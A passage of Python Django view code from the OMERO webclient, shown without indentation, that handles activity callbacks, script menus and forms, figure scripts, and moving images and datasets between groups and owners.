conn=conn, year=year, month=month, day=day, eid=filter_user_id
)
controller.get_items(page)
context = {"controller": controller}
context["template"] = template
return context
def getObjectUrl(conn, obj):
"""
This provides a url to browse to the specified omero.model.ObjectI P/D/I,
S/P, FileAnnotation etc. used to display results from the scripting
service
E.g webclient/userdata/?path=image-12601
If the object is a file annotation, try to browse to the parent P/D/I
"""
base_url = reverse(viewname="load_template", args=["userdata"])
# if we have a File Annotation, then we want our URL to be for the parent
# object...
if isinstance(obj, omero.model.FileAnnotationI):
fa = conn.getObject("Annotation", obj.id.val)
for ptype in ["project", "dataset", "image"]:
links = list(fa.getParentLinks(ptype))
if len(links) > 0:
obj = links[0].parent
break
if obj.__class__.__name__ in (
"ImageI",
"DatasetI",
"ProjectI",
"ScreenI",
"PlateI",
"WellI",
):
otype = obj.__class__.__name__[:-1].lower()
base_url += "?show=%s-%s" % (otype, obj.id.val)
return base_url
######################
# Activities window & Progressbar
def update_callback(request, cbString, **kwargs):
"""Update a callback handle with key/value pairs"""
for key, value in kwargs.items():
request.session["callback"][cbString][key] = value
@login_required()
@render_response()
def activities(request, conn=None, **kwargs):
"""
This refreshes callback handles (delete, scripts, chgrp etc) and provides
html to update Activities window & Progressbar.
The returned html contains details for ALL callbacks in web session,
regardless of their status.
We also add counts of jobs, failures and 'in progress' to update status
bar.
"""
in_progress = 0
failure = 0
new_results = []
_purgeCallback(request)
# If we have a jobId (not added to request.session) just process it...
# ONLY used for chgrp/chown dry-run.
jobId = request.GET.get("jobId", None)
if jobId is not None:
jobId = str(jobId)
try:
prx = omero.cmd.HandlePrx.checkedCast(conn.c.ic.stringToProxy(jobId))
status = prx.getStatus()
logger.debug("job status: %s", status)
rsp = prx.getResponse()
if rsp is not None:
rv = graphResponseMarshal(conn, rsp)
rv["finished"] = True
else:
rv = {"finished": False}
rv["status"] = {
"currentStep": status.currentStep,
"steps": status.steps,
"startTime": status.startTime,
"stopTime": status.stopTime,
}
except IceException:
rv = {"finished": True}
return rv
elif request.method == "DELETE":
try:
json_data = json.loads(request.body)
except TypeError:
# for Python 3.5
json_data = json.loads(bytes_to_native_str(request.body))
jobId = json_data.get("jobId", None)
if jobId is not None:
jobId = str(jobId)
rv = {"jobId": jobId}
try:
prx = omero.cmd.HandlePrx.checkedCast(conn.c.ic.stringToProxy(jobId))
status = prx.getStatus()
logger.debug("pre-cancel() job status: %s", status)
rv["status"] = {
"currentStep": status.currentStep,
"steps": status.steps,
"startTime": status.startTime,
"stopTime": status.stopTime,
}
prx.cancel()
except omero.LockTimeout:
# expected that it will take > 5 seconds to cancel
logger.info("Timeout on prx.cancel()")
return rv
# test each callback for failure, errors, completion, results etc
for cbString in request.session.get("callback").keys():
callbackDict = request.session["callback"][cbString]
job_type = callbackDict["job_type"]
status = callbackDict["status"]
if status == "failed":
failure += 1
request.session.modified = True
# update chgrp / chown
if job_type in ("chgrp", "chown"):
if status not in ("failed", "finished"):
rsp = None
try:
prx = omero.cmd.HandlePrx.checkedCast(
conn.c.ic.stringToProxy(cbString)
)
rsp = prx.getResponse()
close_handle = False
try:
# if response is None, then we're still in progress,
# otherwise...
if rsp is not None:
close_handle = True
new_results.append(cbString)
if isinstance(rsp, omero.cmd.ERR):
rsp_params = ", ".join(
[
"%s: %s" % (k, v)
for k, v in rsp.parameters.items()
]
)
logger.error(
"%s failed with: %s" % (job_type, rsp_params)
)
update_callback(
request,
cbString,
status="failed",
report="%s %s" % (rsp.name, rsp_params),
error=1,
)
elif isinstance(rsp, omero.cmd.OK):
update_callback(request, cbString, status="finished")
else:
in_progress += 1
finally:
prx.close(close_handle)
except Exception:
logger.info(
"Activities %s handle not found: %s" % (job_type, cbString)
)
continue
elif job_type == "send_email":
if status not in ("failed", "finished"):
rsp = None
try:
prx = omero.cmd.HandlePrx.checkedCast(
conn.c.ic.stringToProxy(cbString)
)
callback = omero.callbacks.CmdCallbackI(
conn.c, prx, foreground_poll=True
)
rsp = callback.getResponse()
close_handle = False
try:
# if response is None, then we're still in progress,
# otherwise...
if rsp is not None:
close_handle = True
new_results.append(cbString)
if isinstance(rsp, omero.cmd.ERR):
rsp_params = ", ".join(
[
"%s: %s" % (k, v)
for k, v in rsp.parameters.items()
]
)
logger.error("send_email failed with: %s" % rsp_params)
update_callback(
request,
cbString,
status="failed",
report={"error": rsp_params},
error=1,
)
else:
total = (
rsp.success
+ len(rsp.invalidusers)
+ len(rsp.invalidemails)
)
update_callback(
request,
cbString,
status="finished",
rsp={"success": rsp.success, "total": total},
)
if (
len(rsp.invalidusers) > 0
or len(rsp.invalidemails) > 0
):
invalidusers = [
e.getFullName()
for e in list(
conn.getObjects(
"Experimenter", rsp.invalidusers
)
)
]
update_callback(
request,
cbString,
report={
"invalidusers": invalidusers,
"invalidemails": rsp.invalidemails,
},
)
else:
in_progress += 1
finally:
callback.close(close_handle)
except Exception:
logger.error(traceback.format_exc())
logger.info("Activities send_email handle not found: %s" % cbString)
# update delete
elif job_type == "delete":
if status not in ("failed", "finished"):
try:
handle = omero.cmd.HandlePrx.checkedCast(
conn.c.ic.stringToProxy(cbString)
)
cb = omero.callbacks.CmdCallbackI(
conn.c, handle, foreground_poll=True
)
rsp = cb.getResponse()
close_handle = False
try:
if not rsp: # Response not available
update_callback(
request,
cbString,
error=0,
status="in progress",
dreport=_formatReport(handle),
)
in_progress += 1
else: # Response available
close_handle = True
new_results.append(cbString)
rsp = cb.getResponse()
err = isinstance(rsp, omero.cmd.ERR)
if err:
update_callback(
request,
cbString,
error=1,
status="failed",
dreport=_formatReport(handle),
)
failure += 1
else:
update_callback(
request,
cbString,
error=0,
status="finished",
dreport=_formatReport(handle),
)
finally:
cb.close(close_handle)
except Ice.ObjectNotExistException:
update_callback(
request, cbString, error=0, status="finished", dreport=None
)
except Exception as x:
logger.error(traceback.format_exc())
logger.error("Status job '%s'error:" % cbString)
update_callback(
request, cbString, error=1, status="failed", dreport=str(x)
)
failure += 1
# update scripts
elif job_type == "script":
# if error on runScript, the cbString is not a ProcessCallback...
if not cbString.startswith("ProcessCallback"):
continue # ignore
if status not in ("failed", "finished"):
logger.info("Check callback on script: %s" % cbString)
try:
proc = omero.grid.ScriptProcessPrx.checkedCast(
conn.c.ic.stringToProxy(cbString)
)
except IceException:
update_callback(
request,
cbString,
status="failed",
Message="No process found for job",
error=1,
)
continue
cb = omero.scripts.ProcessCallbackI(conn.c, proc)
# check if we get something back from the handle...
if cb.block(0): # ms.
cb.close()
try:
# we can only retrieve this ONCE - must save results
results = proc.getResults(0, conn.SERVICE_OPTS)
update_callback(request, cbString, status="finished")
new_results.append(cbString)
except Exception:
update_callback(
request,
cbString,
status="finished",
Message="Failed to get results",
)
logger.info("Failed on proc.getResults() for OMERO.script")
continue
# value could be rstring, rlong, robject
rMap = {}
for key, value in results.items():
v = value.getValue()
if key in ("stdout", "stderr", "Message"):
if key in ("stderr", "stdout"):
# just save the id of original file
v = v.id.val
update_kwargs = {key: v}
update_callback(request, cbString, **update_kwargs)
else:
if hasattr(v, "id"):
# do we have an object (ImageI,
# FileAnnotationI etc)
obj_data = {
"id": v.id.val,
"type": v.__class__.__name__[:-1],
}
obj_data["browse_url"] = getObjectUrl(conn, v)
if v.isLoaded() and hasattr(v, "file"):
# try:
mimetypes = {
"image/png": "png",
"image/jpeg": "jpeg",
"text/plain": "text",
}
if v.file.mimetype.val in mimetypes:
obj_data["fileType"] = mimetypes[
v.file.mimetype.val
]
obj_data["fileId"] = v.file.id.val
obj_data["name"] = v.file.name.val
# except Exception:
# pass
if v.isLoaded() and hasattr(v, "name"):
# E.g Image, OriginalFile etc
name = unwrap(v.name)
if name is not None:
# E.g. FileAnnotation has null name
obj_data["name"] = name
rMap[key] = obj_data
else:
rMap[key] = unwrap(v)
update_callback(request, cbString, results=rMap)
else:
in_progress += 1
# having updated the request.session, we can now prepare the data for http
# response
rv = {}
for cbString in request.session.get("callback").keys():
# make a copy of the map in session, so that we can replace non
# json-compatible objects, without modifying session
rv[cbString] = copy.copy(request.session["callback"][cbString])
# return json (used for testing)
if "template" in kwargs and kwargs["template"] == "json":
for cbString in request.session.get("callback").keys():
rv[cbString]["start_time"] = str(
request.session["callback"][cbString]["start_time"]
)
rv["inprogress"] = in_progress
rv["failure"] = failure
rv["jobs"] = len(request.session["callback"])
return JsonResponse(rv) # json
jobs = []
new_errors = False
for key, data in rv.items():
# E.g. key: ProcessCallback/39f77932-c447-40d8-8f99-910b5a531a25 -t:tcp -h 10.211.55.2 -p 54727:tcp -h 10.37.129.2 -p 54727:tcp -h 10.12.2.21 -p 54727 # noqa
# create id we can use as html id,
# E.g. 39f77932-c447-40d8-8f99-910b5a531a25
if len(key.split(" ")) > 0:
htmlId = key.split(" ")[0]
if len(htmlId.split("/")) > 1:
htmlId = htmlId.split("/")[1]
rv[key]["id"] = htmlId
rv[key]["key"] = key
if key in new_results:
rv[key]["new"] = True
if "error" in data and data["error"] > 0:
new_errors = True
jobs.append(rv[key])
jobs.sort(key=lambda x: x["start_time"], reverse=True)
context = {
"sizeOfJobs": len(request.session["callback"]),
"jobs": jobs,
"inprogress": in_progress,
"new_results": len(new_results),
"new_errors": new_errors,
"failure": failure,
}
context["template"] = "webclient/activities/activitiesContent.html"
return context
@login_required()
def activities_update(request, action, **kwargs):
"""
If the above 'action' == 'clean' then we clear jobs from
request.session['callback'] either a single job (if 'jobKey' is specified
in POST) or all jobs (apart from those in progress)
"""
request.session.modified = True
if action == "clean":
if "jobKey" in request.POST:
jobId = request.POST.get("jobKey")
rv = {}
if jobId in request.session["callback"]:
del request.session["callback"][jobId]
request.session.modified = True
rv["removed"] = True
else:
rv["removed"] = False
return JsonResponse(rv)
else:
jobs = list(request.session["callback"].items())
for key, data in jobs:
if data["status"] != "in progress":
del request.session["callback"][key]
return HttpResponse("OK")
##############################################################################
# User Photo
@login_required()
def avatar(request, oid=None, conn=None, **kwargs):
"""Returns the experimenter's photo"""
photo = conn.getExperimenterPhoto(oid)
return HttpResponse(photo, content_type="image/jpeg")
##############################################################################
# webgateway extention
@login_required()
def image_viewer(request, iid, share_id=None, **kwargs):
"""Delegates to webgateway, using share connection if appropriate"""
kwargs["viewport_server"] = (
share_id is not None and reverse("webindex") + share_id or reverse("webindex")
)
# remove any trailing slash
kwargs["viewport_server"] = kwargs["viewport_server"].rstrip("/")
return webgateway_views.full_viewer(request, iid, **kwargs)
##############################################################################
# scripting service....
@login_required()
@render_response()
def list_scripts(request, conn=None, **kwargs):
"""
List the available scripts - Just officical scripts for now
If all scripts are under a single top-level directory, this is
removed by default. To prevent this, use ?full_path=true
"""
scriptService = conn.getScriptService()
scripts = scriptService.getScripts()
# group scripts into 'folders' (path), named by parent folder name
scriptMenu = {}
scripts_to_ignore = (
request.session.get("server_settings", {})
.get("scripts_to_ignore", "")
.split(",")
)
for s in scripts:
scriptId = s.id.val
path = s.path.val
name = s.name.val
fullpath = os.path.join(path, name)
if fullpath in scripts_to_ignore:
logger.info("Ignoring script %r" % fullpath)
continue
# We want to build a hierarchical <ul> <li> structure
# Each <ul> is a {}, each <li> is either a script 'name': <id> or
# directory 'name': {ul}
ul = scriptMenu
dirs = fullpath.split(os.path.sep)
for li, d in enumerate(dirs):
if len(d) == 0:
continue
if d not in ul:
# if last component in path:
if li + 1 == len(dirs):
ul[d] = scriptId
else:
ul[d] = {}
ul = ul[d]
# convert <ul> maps into lists and sort
def ul_to_list(ul):
dir_list = []
for name, value in ul.items():
if isinstance(value, dict):
# value is a directory
dir_list.append({"name": name, "ul": ul_to_list(value)})
else:
dir_list.append({"name": name, "id": value})
dir_list.sort(key=lambda x: x["name"].lower())
return dir_list
scriptList = ul_to_list(scriptMenu)
# If we have a single top-level directory, we can skip it
if not request.GET.get("full_path") and len(scriptList) == 1:
scriptList = scriptList[0]["ul"]
return scriptList
@login_required()
@render_response()
def script_ui(request, scriptId, conn=None, **kwargs):
"""
Generates an html form for the parameters of a defined script.
"""
scriptService = conn.getScriptService()
try:
params = scriptService.getParams(long(scriptId))
except Exception as ex:
if ex.message.lower().startswith("no processor available"):
return {
"template": "webclient/scripts/no_processor.html",
"scriptId": scriptId,
}
raise ex
if params is None:
return HttpResponse()
paramData = {}
paramData["id"] = long(scriptId)
paramData["name"] = params.name.replace("_", " ")
paramData["description"] = params.description
paramData["authors"] = ", ".join([a for a in params.authors])
paramData["contact"] = params.contact
paramData["version"] = params.version
paramData["institutions"] = ", ".join([i for i in params.institutions])
inputs = [] # use a list so we can sort by 'grouping'
Data_TypeParam = None
IDsParam = None
for key, param in params.inputs.items():
i = {}
i["name"] = key.replace("_", " ")
i["key"] = key
if not param.optional:
i["required"] = True
i["description"] = param.description
if param.min:
i["min"] = str(param.min.getValue())
if param.max:
i["max"] = str(param.max.getValue())
if param.values:
i["options"] = [v.getValue() for v in param.values.getValue()]
if param.useDefault:
i["default"] = unwrap(param.prototype)
if isinstance(i["default"], omero.model.IObject):
i["default"] = None
pt = unwrap(param.prototype)
if pt.__class__.__name__ == "dict":
i["map"] = True
elif pt.__class__.__name__ == "list":
i["list"] = True
if "default" in i:
i["default"] = ",".join([str(d) for d in i["default"]])
elif isinstance(pt, bool):
i["boolean"] = True
elif isinstance(pt, int) or isinstance(pt, long):
# will stop the user entering anything other than numbers.
i["number"] = "number"
elif isinstance(pt, float):
i["number"] = "float"
# if we got a value for this key in the page request, use this as
# default
if request.GET.get(key, None) is not None:
i["default"] = request.GET.get(key, None)
# E.g "" (string) or [0] (int list) or 0.0 (float)
i["prototype"] = unwrap(param.prototype)
i["grouping"] = param.grouping
inputs.append(i)
if key == "IDs":
IDsParam = i # remember these...
if key == "Data_Type":
Data_TypeParam = i
inputs.sort(key=lambda i: i["grouping"])
# if we have Data_Type param - use the request parameters to populate IDs
if (
Data_TypeParam is not None
and IDsParam is not None
and "options" in Data_TypeParam
):
IDsParam["default"] = ""
for dtype in Data_TypeParam["options"]:
if request.GET.get(dtype, None) is not None:
Data_TypeParam["default"] = dtype
IDsParam["default"] = request.GET.get(dtype, "")
break # only use the first match
# if we've not found a match, check whether we have "Well" selected
if len(IDsParam["default"]) == 0 and request.GET.get("Well", None) is not None:
if "Image" in Data_TypeParam["options"]:
wellIds = [long(j) for j in request.GET.get("Well", None).split(",")]
wellIdx = 0
try:
wellIdx = int(request.GET.get("Index", 0))
except Exception:
pass
wells = conn.getObjects("Well", wellIds)
imgIds = [str(w.getImage(wellIdx).getId()) for w in wells]
Data_TypeParam["default"] = "Image"
IDsParam["default"] = ",".join(imgIds)
# try to determine hierarchies in the groupings - ONLY handle 1 hierarchy
# level now (not recursive!)
for i in range(len(inputs)):
if len(inputs) <= i:
# we may remove items from inputs as we go - need to check
break
param = inputs[i]
grouping = param["grouping"] # E.g 03
param["children"] = list()
while len(inputs) > i + 1:
nextGrp = inputs[i + 1]["grouping"] # E.g. 03.1
if nextGrp.split(".")[0] == grouping:
param["children"].append(inputs[i + 1])
inputs.pop(i + 1)
else:
break
paramData["inputs"] = inputs
return {
"template": "webclient/scripts/script_ui.html",
"paramData": paramData,
"scriptId": scriptId,
}
@login_required()
@render_response()
def figure_script(request, scriptName, conn=None, **kwargs):
"""
Show a UI for running figure scripts
"""
imageIds = request.GET.get("Image", None) # comma - delimited list
datasetIds = request.GET.get("Dataset", None)
wellIds = request.GET.get("Well", None)
if wellIds is not None:
wellIds = [long(i) for i in wellIds.split(",")]
wells = conn.getObjects("Well", wellIds)
wellIdx = getIntOrDefault(request, "Index", 0)
imageIds = [str(w.getImage(wellIdx).getId()) for w in wells]
imageIds = ",".join(imageIds)
if imageIds is None and datasetIds is None:
return HttpResponse(
"Need to specify /?Image=1,2 or /?Dataset=1,2 or /?Well=1,2"
)
def validateIds(dtype, ids):
ints = [int(oid) for oid in ids.split(",")]
validObjs = {}
for obj in conn.getObjects(dtype, ints):
validObjs[obj.id] = obj
filteredIds = [iid for iid in ints if iid in validObjs.keys()]
if len(filteredIds) == 0:
raise Http404("No %ss found with IDs %s" % (dtype, ids))
else:
# Now we can specify group context - All should be same group
gid = list(validObjs.values())[0].getDetails().group.id.val
conn.SERVICE_OPTS.setOmeroGroup(gid)
return filteredIds, validObjs
context = {}
if imageIds is not None:
imageIds, validImages = validateIds("Image", imageIds)
context["idString"] = ",".join([str(i) for i in imageIds])
context["dtype"] = "Image"
if datasetIds is not None:
datasetIds, validDatasets = validateIds("Dataset", datasetIds)
context["idString"] = ",".join([str(i) for i in datasetIds])
context["dtype"] = "Dataset"
if scriptName == "SplitView":
scriptPath = "/omero/figure_scripts/Split_View_Figure.py"
template = "webclient/scripts/split_view_figure.html"
# Lookup Tags & Datasets (for row labels)
imgDict = [] # A list of data about each image.
for iId in imageIds:
data = {"id": iId}
img = validImages[iId]
data["name"] = img.getName()
tags = [
ann.getTextValue()
for ann in img.listAnnotations()
if ann._obj.__class__ == omero.model.TagAnnotationI
]
data["tags"] = tags
data["datasets"] = [d.getName() for d in img.listParents()]
imgDict.append(data)
# Use the first image as a reference
image = validImages[imageIds[0]]
context["imgDict"] = imgDict
context["image"] = image
context["channels"] = image.getChannels()
elif scriptName == "Thumbnail":
scriptPath = "/omero/figure_scripts/Thumbnail_Figure.py"
template = "webclient/scripts/thumbnail_figure.html"
def loadImageTags(imageIds):
tagLinks = conn.getAnnotationLinks("Image", parent_ids=imageIds)
linkMap = {} # group tags. {imageId: [tags]}
tagMap = {}
for iId in imageIds:
linkMap[iId] = []
for link in tagLinks:
c = link.getChild()
if c._obj.__class__ == omero.model.TagAnnotationI:
tagMap[c.id] = c
linkMap[link.getParent().id].append(c)
imageTags = []
for iId in imageIds:
imageTags.append({"id": iId, "tags": linkMap[iId]})
tags = []
for tId, t in tagMap.items():
tags.append(t)
return imageTags, tags
thumbSets = [] # multiple collections of images
tags = []
figureName = "Thumbnail_Figure"
if datasetIds is not None:
for d in conn.getObjects("Dataset", datasetIds):
imgIds = [i.id for i in d.listChildren()]
imageTags, ts = loadImageTags(imgIds)
thumbSets.append({"name": d.getName(), "imageTags": imageTags})
tags.extend(ts)
figureName = thumbSets[0]["name"]
else:
imageTags, ts = loadImageTags(imageIds)
thumbSets.append({"name": "images", "imageTags": imageTags})
tags.extend(ts)
parent = conn.getObject("Image", imageIds[0]).getParent()
figureName = parent.getName() or "Thumbnail Figure"
context["parent_id"] = parent.getId()
uniqueTagIds = set() # remove duplicates
uniqueTags = []
for t in tags:
if t.id not in uniqueTagIds:
uniqueTags.append(t)
uniqueTagIds.add(t.id)
uniqueTags.sort(key=lambda x: x.getTextValue().lower())
context["thumbSets"] = thumbSets
context["tags"] = uniqueTags
context["figureName"] = figureName.replace(" ", "_")
elif scriptName == "MakeMovie":
scriptPath = "/omero/export_scripts/Make_Movie.py"
template = "webclient/scripts/make_movie.html"
# expect to run on a single image at a time
image = conn.getObject("Image", imageIds[0])
# remove extension (if 3 chars or less)
movieName = image.getName().rsplit(".", 1)
if len(movieName) > 1 and len(movieName[1]) > 3:
movieName = ".".join(movieName)
else:
movieName = movieName[0]
# make sure name is not a path
context["movieName"] = os.path.basename(movieName)
chs = []
for c in image.getChannels():
chs.append(
{
"active": c.isActive(),
"color": c.getColor().getHtml(),
"label": c.getLabel(),
}
)
context["channels"] = chs
context["sizeT"] = image.getSizeT()
context["sizeZ"] = image.getSizeZ()
scriptService = conn.getScriptService()
scriptId = scriptService.getScriptID(scriptPath)
if scriptId < 0:
raise AttributeError("No script found for path '%s'" % scriptPath)
context["template"] = template
context["scriptId"] = scriptId
return context
@login_required()
@render_response()
def fileset_check(request, action, conn=None, **kwargs):
"""
Check whether Images / Datasets etc contain partial Multi-image filesets.
Used by chgrp or delete dialogs to test whether we can perform this
'action'.
"""
dtypeIds = {}
for dtype in ("Image", "Dataset", "Project"):
ids = request.GET.get(dtype, None)
if ids is not None:
dtypeIds[dtype] = [int(i) for i in ids.split(",")]
splitFilesets = conn.getContainerService().getImagesBySplitFilesets(
dtypeIds, None, conn.SERVICE_OPTS
)
splits = []
for fsId, splitIds in splitFilesets.items():
splits.append(
{
"id": fsId,
"attempted_iids": splitIds[True],
"blocking_iids": splitIds[False],
}
)
context = {"split_filesets": splits}
context["action"] = action
if action == "chgrp":
context["action"] = "move"
context["template"] = "webclient/activities/" "fileset_check_dialog_content.html"
return context
def getAllObjects(
conn, project_ids, dataset_ids, image_ids, screen_ids, plate_ids, experimenter_id
):
"""
Given a list of containers and images, calculate all the descendants
and necessary siblings (for any filesets)
"""
# TODO Handle None inputs, maybe add defaults
params = omero.sys.ParametersI()
qs = conn.getQueryService()
project_ids = set(project_ids)
dataset_ids = set(dataset_ids)
image_ids = set(image_ids)
fileset_ids = set([])
plate_ids = set(plate_ids)
screen_ids = set(screen_ids)
# Get any datasets for projects
if project_ids:
params.map = {}
params.map["pids"] = rlist([rlong(x) for x in list(project_ids)])
q = """
select pdlink.child.id
from ProjectDatasetLink pdlink
where pdlink.parent.id in (:pids)
"""
for e in qs.projection(q, params, conn.SERVICE_OPTS):
dataset_ids.add(e[0].val)
# Get any plates for screens
if screen_ids:
params.map = {}
params.map["sids"] = rlist([rlong(x) for x in screen_ids])
q = """
select splink.child.id
from ScreenPlateLink splink
where splink.parent.id in (:sids)
"""
for e in qs.projection(q, params, conn.SERVICE_OPTS):
plate_ids.add(e[0].val)
# Get any images for datasets
if dataset_ids:
params.map = {}
params.map["dids"] = rlist([rlong(x) for x in dataset_ids])
q = """
select dilink.child.id,
dilink.child.fileset.id
from DatasetImageLink dilink
where dilink.parent.id in (:dids)
"""
for e in qs.projection(q, params, conn.SERVICE_OPTS):
image_ids.add(e[0].val)
# Some images in Dataset may not have fileset
if e[1] is not None:
fileset_ids.add(e[1].val)
# Get any images for plates
# TODO Seemed no need to add the filesets for plates as it isn't possible
# to link it from outside of its plate. This may be true for the client,
# but it certainly isn't true for the model so maybe allow this to also get
# filesets
if plate_ids:
params.map = {}
params.map["plids"] = rlist([rlong(x) for x in plate_ids])
q = """
select ws.image.id
from WellSample ws
join ws.plateAcquisition pa
where pa.plate.id in (:plids)
"""
for e in qs.projection(q, params, conn.SERVICE_OPTS):
image_ids.add(e[0].val)
# Get any extra images due to filesets
if fileset_ids:
params.map = {}
params.map["fsids"] = rlist([rlong(x) for x in fileset_ids])
q = """
select image.id
from Image image
left outer join image.datasetLinks dilink
where image.fileset.id in (select fs.id
from Image im
join im.fileset fs
where fs.id in (:fsids)
group by fs.id
having count(im.id)>1)
"""
for e in qs.projection(q, params, conn.SERVICE_OPTS):
image_ids.add(e[0].val)
# Get any additional datasets that may need updating as their children have
# been snatched.
# TODO Need to differentiate which orphaned directories need refreshing
extra_dataset_ids = set([])
extra_orphaned = False
if image_ids:
params.map = {
"iids": rlist([rlong(x) for x in image_ids]),
}
exclude_datasets = ""
if dataset_ids:
params.map["dids"] = rlist([rlong(x) for x in dataset_ids])
# Make sure to allow parentless results as well as those
# that do not match a dataset being removed
exclude_datasets = """
and (
dilink.parent.id not in (:dids)
or dilink.parent.id = null
)
"""
q = (
"""
select distinct dilink.parent.id
from Image image
left outer join image.datasetLinks dilink
where image.id in (:iids)
%s
and (select count(dilink2.child.id)
from DatasetImageLink dilink2
where dilink2.parent.id = dilink.parent.id
and dilink2.child.id not in (:iids)) = 0
"""
% exclude_datasets
)
for e in qs.projection(q, params, conn.SERVICE_OPTS):
if e:
extra_dataset_ids.add(e[0].val)
else:
extra_orphaned = True
# Get any additional projects that may need updating as their children have
# been snatched. There is no need to check for orphans because if a dataset
# is being removed from somewhere else, it can not exist as an orphan.
extra_project_ids = set([])
if dataset_ids:
params.map = {"dids": rlist([rlong(x) for x in dataset_ids])}
exclude_projects = ""
if project_ids:
params.map["pids"] = rlist([rlong(x) for x in project_ids])
exclude_projects = "and pdlink.parent.id not in (:pids)"
q = (
"""
select distinct pdlink.parent.id
from ProjectDatasetLink pdlink
where pdlink.child.id in (:dids)
%s
and (select count(pdlink2.child.id)
from ProjectDatasetLink pdlink2
where pdlink2.parent.id = pdlink.parent.id
and pdlink2.child.id not in (:dids)) = 0
"""
% exclude_projects
)
for e in qs.projection(q, params, conn.SERVICE_OPTS):
extra_project_ids.add(e[0].val)
# We now have the complete list of objects that will change group
# We also have an additional list of datasets/projects that may have had
# snatched children and thus may need updating in the client if the
# dataset/project has gone from N to 0 children
result = {
# These objects are completely removed
"remove": {
"project": list(project_ids),
"dataset": list(dataset_ids),
"screen": list(screen_ids),
"plate": list(plate_ids),
"image": list(image_ids),
},
# These objects now have no children
"childless": {
"project": list(extra_project_ids),
"dataset": list(extra_dataset_ids),
"orphaned": extra_orphaned,
},
}
return result
@require_POST
@login_required()
def chgrpDryRun(request, conn=None, **kwargs):
return dryRun(request, action="chgrp", conn=conn, **kwargs)
@require_POST
@login_required()
def dryRun(request, action, conn=None, **kwargs):
"""Submit chgrp or chown dry-run"""
targetObjects = {}
dtypes = ["Project", "Dataset", "Image", "Screen", "Plate", "Fileset"]
for dtype in dtypes:
oids = request.POST.get(dtype, None)
if oids is not None:
obj_ids = [int(oid) for oid in oids.split(",")]
targetObjects[dtype] = obj_ids
if action == "chgrp":
target_id = getIntOrDefault(request, "group_id", None)
elif action == "chown":
target_id = getIntOrDefault(request, "owner_id", None)
handle = conn.submitDryRun(action, targetObjects, target_id)
jobId = str(handle)
return HttpResponse(jobId)
@login_required()
def chgrp(request, conn=None, **kwargs):
"""
Moves data to a new group, using the chgrp queue.
Handles submission of chgrp form: all data in POST.
Adds the callback handle to the request.session['callback']['jobId']
"""
if not request.method == "POST":
return JsonResponse({"Error": "Need to POST to chgrp"}, status=405)
# Get the target group_id
group_id = getIntOrDefault(request, "group_id", None)
if group_id is None:
return JsonResponse({"Error": "chgrp: No group_id specified"})
group_id = long(group_id)
def getObjectOwnerId(r):
for t in ["Dataset", "Image", "Plate"]:
ids = r.POST.get(t, None)
if ids is not None:
for o in list(conn.getObjects(t, ids.split(","))):
return o.getDetails().owner.id.val
group = conn.getObject("ExperimenterGroup", group_id)
new_container_name = request.POST.get("new_container_name", None)
new_container_type = request.POST.get("new_container_type", None)
container_id = None
# Context must be set to owner of data, E.g. to create links.
ownerId = getObjectOwnerId(request)
conn.SERVICE_OPTS.setOmeroUser(ownerId)
if (
new_container_name is not None
and len(new_container_name) > 0
and new_container_type is not None
):
conn.SERVICE_OPTS.setOmeroGroup(group_id)
container_id = conn.createContainer(new_container_type, new_container_name)
# No new container, check if target is specified
if container_id is None:
# E.g. "dataset-234"
target_id = request.POST.get("target_id", None)
container_id = target_id is not None and target_id.split("-")[1] or None
dtypes = ["Project", "Dataset", "Image", "Screen", "Plate"]
for dtype in dtypes:
# Get all requested objects of this type
oids = request.POST.get(dtype, None)
if oids is not None:
obj_ids = [int(oid) for oid in oids.split(",")]
# TODO Doesn't the filesets only apply to images?
# if 'filesets' are specified, make sure we move ALL Fileset Images
fsIds = request.POST.getlist("fileset")
if len(fsIds) > 0:
# If a dataset is being moved and there is a split fileset
# then those images need to go somewhere in the new
if dtype == "Dataset":
conn.regroupFilesets(dsIds=obj_ids, fsIds=fsIds)
else:
for fs in conn.getObjects("Fileset", fsIds):
obj_ids.extend([i.id for i in fs.copyImages()])
obj_ids = list(set(obj_ids)) # remove duplicates
logger.debug("chgrp to group:%s %s-%s" % (group_id, dtype, obj_ids))
handle = conn.chgrpObjects(dtype, obj_ids, group_id, container_id)
jobId = str(handle)
request.session["callback"][jobId] = {
"job_type": "chgrp",
"group": group.getName(),
"to_group_id": group_id,
"dtype": dtype,
"obj_ids": obj_ids,
"job_name": "Change group",
"start_time": datetime.datetime.now(),
"status": "in progress",
}
request.session.modified = True
# Update contains a list of images/containers that need to be
# updated.
project_ids = request.POST.get("Project", [])
dataset_ids = request.POST.get("Dataset", [])
image_ids = request.POST.get("Image", [])
screen_ids = request.POST.get("Screen", [])
plate_ids = request.POST.get("Plate", [])
if project_ids:
project_ids = [long(x) for x in project_ids.split(",")]
if dataset_ids:
dataset_ids = [long(x) for x in dataset_ids.split(",")]
if image_ids:
image_ids = [long(x) for x in image_ids.split(",")]
if screen_ids:
screen_ids = [long(x) for x in screen_ids.split(",")]
if plate_ids:
plate_ids = [long(x) for x in plate_ids.split(",")]
# TODO Change this user_id to be an experimenter_id in the request as it
# is possible that a user is chgrping data from another user so it is
# that users orphaned that will need updating. Or maybe all orphaned
# directories could potentially need updating?
# Create a list of objects that have been changed by this operation. This
# can be used by the client to visually update.
update = getAllObjects(
conn,
project_ids,
dataset_ids,
image_ids,
screen_ids,
plate_ids,
request.session.get("user_id"),
)
# return HttpResponse("OK")
return JsonResponse({"update": update})
@login_required()
def chown(request, conn=None, **kwargs):
"""
Moves data to a new owner, using the chown queue.
Handles submission of chown form: all data in POST.
Adds the callback handle to the request.session['callback']['jobId']
"""
if not request.method == "POST":
return JsonResponse({"Error": "Need to POST to chown"}, status=405)
# Get the target owner_id
owner_id = getIntOrDefault(request, "owner_id", None)
if owner_id is None:
return JsonResponse({"Error": "chown: No owner_id specified"})
owner_id = int(owner_id)
exp = conn.getObject("Experimenter", owner_id)
if exp is None:
return JsonResponse({"Error": "chown: Experimenter not found" % owner_id})
dtypes = ["Project", "Dataset", "Image", "Screen", "Plate"]
jobIds = []
for dtype in dtypes:
# Get all requested objects of this type
oids = request.POST.get(dtype, None)
if oids is not None:
obj_ids = [int(oid) for oid in oids.split(",")]
logger.debug("chown to owner:%s %s-%s" % (owner_id, dtype, obj_ids))
handle = conn.chownObjects(dtype, obj_ids, owner_id)
jobId = str(handle)
jobIds.append(jobId)
request.session["callback"][jobId] = {
"job_type": "chown",
"owner": exp.getFullName(),
"to_owner_id": owner_id,
"dtype": dtype,
"obj_ids": obj_ids,
"job_name": "Change owner",
"start_time": datetime.datetime.now(),
"status": "in progress",
}
request.session.modified = True
